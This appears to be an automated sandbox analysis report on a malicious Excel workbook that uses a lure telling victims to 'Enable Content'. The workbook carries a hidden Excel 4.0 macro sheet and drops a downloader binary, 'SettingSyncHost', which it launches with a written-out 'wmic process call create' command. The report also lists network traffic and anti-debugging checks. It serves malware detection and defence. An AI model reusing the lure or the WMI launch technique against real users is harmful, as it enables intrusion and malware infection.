    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://tasks.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownHTTPS traffic detected: 95.142.44.93:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.4:49739 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable Editing" " and then "Enable Content" button. 22 23 24 25 26 27 28 " " 29 30 31 32
    Source: Screenshot number: 8Screenshot OCR: Enable Content" button. 22 23 24 25 26 27 28 " " 29 30 31 32 33 34 ConMecmal j 2021 US
    Contains functionality to create processes via WMIShow sources
    Source: WMIC.exe, 00000003.00000002.671294038.0000000002DB0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create 'C:/Users/Public/SettingSyncHost'C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=QFAPOWPUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: Current-Status-062021-81197.xlsbInitial sample: Sheet size: 480182
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHostJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].pngJump to dropped file
    Source: C:\Users\Public\SettingSyncHostProcess Stats: CPU usage > 98%
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003E40F05_2_003E40F0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_0039D0D35_2_0039D0D3
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003AA1335_2_003AA133
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003E72045_2_003E7204
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_0039D4A55_2_0039D4A5
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A95265_2_003A9526
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D85705_2_003D8570
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003CE5D05_2_003CE5D0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003F170D5_2_003F170D
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003ED7BE5_2_003ED7BE
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003B17A05_2_003B17A0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A57E85_2_003A57E8
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_0039C8A05_2_0039C8A0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_0039D88D5_2_0039D88D
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003F48835_2_003F4883
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003AA8DB5_2_003AA8DB
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003F49A35_2_003F49A3
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A8A865_2_003A8A86
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D3AC05_2_003D3AC0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A9BB95_2_003A9BB9
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A7C9A5_2_003A7C9A
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_0039CD355_2_0039CD35
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003DBD605_2_003DBD60
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003DED5B5_2_003DED5B
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D8D405_2_003D8D40
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A9E345_2_003A9E34
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00395E1E5_2_00395E1E
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003EFE995_2_003EFE99
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A8FD55_2_003A8FD5
    Source: Joe Sandbox ViewDropped File: C:\Users\Public\SettingSyncHost 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
    Source: C:\Users\Public\SettingSyncHostCode function: String function: 0039A560 appears 45 times
    Source: C:\Users\Public\SettingSyncHostCode function: String function: 003D9730 appears 55 times
    Source: classification engineClassification label: mal100.expl.evad.winXLSB@5/8@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_01
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3950737C-20D7-4D17-885E-2145A276803C} - OProcSessId.datJump to behavior
    Source: C:\Users\Public\SettingSyncHostCommand line argument: P(:5_2_003A27A0
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\Public\SettingSyncHostFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\Public\SettingSyncHostFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Current-Status-062021-81197.xlsbVirustotal: Detection: 8%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create 'C:/Users/Public/SettingSyncHost'
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\Public\SettingSyncHost C:/Users/Public/SettingSyncHost
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create 'C:/Users/Public/SettingSyncHost'Jump to behavior
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Current-Status-062021-81197.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb source: SettingSyncHost
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb5 source: SettingSyncHost, 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00391070 LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00391070
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003FC0E5 push esi; ret 5_2_003FC0EE
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003C8149 push eax; ret 5_2_003C8179
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003C81C8 push eax; ret 5_2_003C8179
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_0039A5A5 push ecx; ret 5_2_0039A5B8
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003F5CA5 push ecx; ret 5_2_003F5CB8
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003FAF39 pushad ; iretd 5_2_003FAF3D

    Persistence and Installation Behavior:

    barindex
    Creates processes via WMIShow sources
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHostJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].pngJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHostJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].pngJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHostJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHostJump to dropped file
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003DAAF8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_003DAAF8
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\SettingSyncHostCode function: GetAdaptersInfo,GetAdaptersInfo,5_2_003CBB10
    Source: C:\Users\Public\SettingSyncHostAPI coverage: 7.3 %
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003CCEB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,5_2_003CCEB0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003EA7D5 FindFirstFileExW,5_2_003EA7D5
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW/
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\Public\SettingSyncHostProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00399082 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00399082
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00391070 LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00391070
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003E105A mov eax, dword ptr fs:[00000030h]5_2_003E105A
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00391FE0 mov eax, dword ptr fs:[00000030h]5_2_00391FE0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003EA4CE mov eax, dword ptr fs:[00000030h]5_2_003EA4CE
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00391FE0 mov eax, dword ptr fs:[00000030h]5_2_00391FE0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A045E VirtualQuery,GetModuleFileNameW,GetPdbDll,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,5_2_003A045E
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D9ABA SetUnhandledExceptionFilter,5_2_003D9ABA
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00399082 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00399082
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003DE083 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_003DE083
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003B024E SetUnhandledExceptionFilter,5_2_003B024E
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D94F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_003D94F2
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D9957 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_003D9957
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00393C21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00393C21
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D9776 cpuid 5_2_003D9776
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,5_2_003E901B
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_0039B006
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003EE095
    Source: C:\Users\Public\SettingSyncHostCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0039B0F2
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesA,5_2_0039B0C8
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_003EE120
    Source: C:\Users\Public\SettingSyncHostCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0039B159
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_0039B195
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,5_2_003AC281
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,5_2_003EE373
    Source: C:\Users\Public\SettingSyncHostCode function: __crtGetLocaleInfoA_stat,5_2_003AC35B
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_003EE499
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,5_2_003EE59F
    Source: C:\Users\Public\SettingSyncHostCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_00398594
    Source: C:\Users\Public\SettingSyncHostCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_003EE66E
    Source: C:\Users\Public\SettingSyncHostCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_003988B2
    Source: C:\Users\Public\SettingSyncHostCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_00397908
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003E8AF9
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoA,5_2_0039AADA
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0039AC3E
